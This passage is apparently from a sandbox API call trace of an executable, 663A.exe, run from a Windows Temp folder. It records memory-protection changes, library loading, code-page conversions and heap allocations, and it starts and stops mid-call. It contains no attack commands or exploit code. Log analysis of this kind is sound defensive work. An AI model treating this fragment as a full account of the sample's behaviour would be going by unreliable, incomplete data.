BaseAddress=0x18fabc*=0x424000, NumberOfBytesToProtect=0x18fab4, OldAccessProtection=0x18fdfc*=0x4) returned 0x0 [0135.681] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fabc*=0x401000, NumberOfBytesToProtect=0x18fab4, NewAccessProtection=0x20, OldAccessProtection=0x18fdfc | out: BaseAddress=0x18fabc*=0x401000, NumberOfBytesToProtect=0x18fab4, OldAccessProtection=0x18fdfc*=0x40) returned 0x0 [0135.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fabc*=0x423000, NumberOfBytesToProtect=0x18fab4, NewAccessProtection=0x20, OldAccessProtection=0x18fdfc | out: BaseAddress=0x18fabc*=0x423000, NumberOfBytesToProtect=0x18fab4, OldAccessProtection=0x18fdfc*=0x40) returned 0x0 [0135.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff68 | out: lpSystemTimeAsFileTime=0x18ff68*(dwLowDateTime=0x8c0b34f0, dwHighDateTime=0x1d7fb6e)) [0135.719] GetCurrentThreadId () returned 0xeb8 [0135.719] GetCurrentProcessId () returned 0xeb4 [0135.719] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff60 | out: lpPerformanceCount=0x18ff60*=3085968352667) returned 1 [0136.078] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0136.174] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0136.482] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0136.482] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0136.482] GetLastError () returned 0x7e [0136.482] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0136.483] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0136.509] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0136.689] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0136.689] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0136.690] GetProcessHeap () returned 0x250000 [0136.736] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0137.073] GetLastError () returned 0x7e [0137.074] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0137.075] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0137.075] GetLastError () returned 0x7e [0137.076] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0137.076] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0137.076] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x364) returned 0x2681d0 [0137.180] SetLastError (dwErrCode=0x7e) [0137.299] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe00) returned 0x268540 [0137.301] GetStartupInfoW (in: lpStartupInfo=0x18fea0 | out: lpStartupInfo=0x18fea0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x409360, hStdOutput=0xf8b33df, hStdError=0xfffffffe)) [0137.301] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0137.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0137.302] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0137.302] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" [0137.302] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" [0137.388] GetACP () returned 0x4e4 [0137.388] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x220) returned 0x267eb8 [0137.388] IsValidCodePage (CodePage=0x4e4) returned 1 [0137.388] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fec0 | out: lpCPInfo=0x18fec0) returned 1 [0137.432] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f788 | out: lpCPInfo=0x18f788) returned 1 [0137.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x18f528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0137.475] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18f79c | out: lpCharType=0x18f79c) returned 1 [0137.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x18f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0137.475] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0137.797] GetLastError () returned 0x7e [0137.798] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0137.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f2c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0137.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fc9c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17éÐ\x0fØþ\x18", lpUsedDefaultChar=0x0) returned 256 [0137.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0137.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd9c, cbMultiByte=256, lpWideCharStr=0x18f4f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0137.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0137.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18f2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0137.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fb9c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17éÐ\x0fØþ\x18", lpUsedDefaultChar=0x0) returned 256 [0138.138] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x80) returned 0x266220 [0138.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fce4, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe")) returned 0x2d [0138.229] GetProcAddress (hModule=0x769b0000, lpProcName="AreFileApisANSI") returned 0x76a44671 [0138.229] AreFileApisANSI () returned 1 [0138.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0138.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", cchWideChar=-1, lpMultiByteStr=0x434770, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe", lpUsedDefaultChar=0x0) returned 46 [0138.230] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x36) returned 0x2680e0 [0138.230] RtlInitializeSListHead (in: ListHead=0x434210 | out: ListHead=0x434210) [0138.287] GetLastError () returned 0x0 [0138.287] SetLastError (dwErrCode=0x0) [0138.287] GetEnvironmentStringsW () returned 0x269b48* [0138.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1443 [0138.287] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x5a3) returned 0x26a698 [0138.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x26a698, cbMultiByte=1443, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1443 [0138.287] FreeEnvironmentStringsW (penv=0x269b48) returned 1 [0138.287] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x9c) returned 0x269b48 [0138.287] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1f) returned 0x2698b0 [0138.287] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2b) returned 0x266c88 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x37) returned 0x269bf0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c) returned 0x269c30 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x31) returned 0x269c78 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x268120 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x266488 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x2645e0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xd) returned 0x264768 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x2698d8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266cc0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x19) returned 0x269900 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x17) returned 0x269cb8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe) returned 0x264780 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x95) returned 0x269cd8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x26ac60 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1b) returned 0x269928 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1d) returned 0x269950 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x269d78 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12) returned 0x269dc8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x269de8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1b) returned 0x269978 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x24) returned 0x2664b8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x29) returned 0x266cf8 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1e) returned 0x2699a0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x6b) returned 0x269e08 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x17) returned 0x269e80 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x269ea0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xf) returned 0x264798 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x269ec0 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266d30 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x29) returned 0x266d68 [0138.288] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x269ee0 [0138.289] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x13) returned 0x269f00 [0138.289] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1f) returned 0x2699c8 [0138.289] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x12) returned 0x269f20 [0138.289] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x26bc60 [0138.289] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x46) returned 0x269f40 [0138.289] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26a698 | out: hHeap=0x250000) returned 1 [0138.350] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x26c448 [0138.350] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0138.415] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4071b1) returned 0x0 [0138.782] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x264600 [0138.782] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x76fe0000 [0138.783] GetProcAddress (hModule=0x76fe0000, lpProcName="CompareStringEx") returned 0x77016a72 [0138.783] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesEx") returned 0x76a447ef [0138.783] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0138.784] GetLastError () returned 0x7e [0138.784] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatEx") returned 0x76a56c26 [0138.785] GetProcAddress 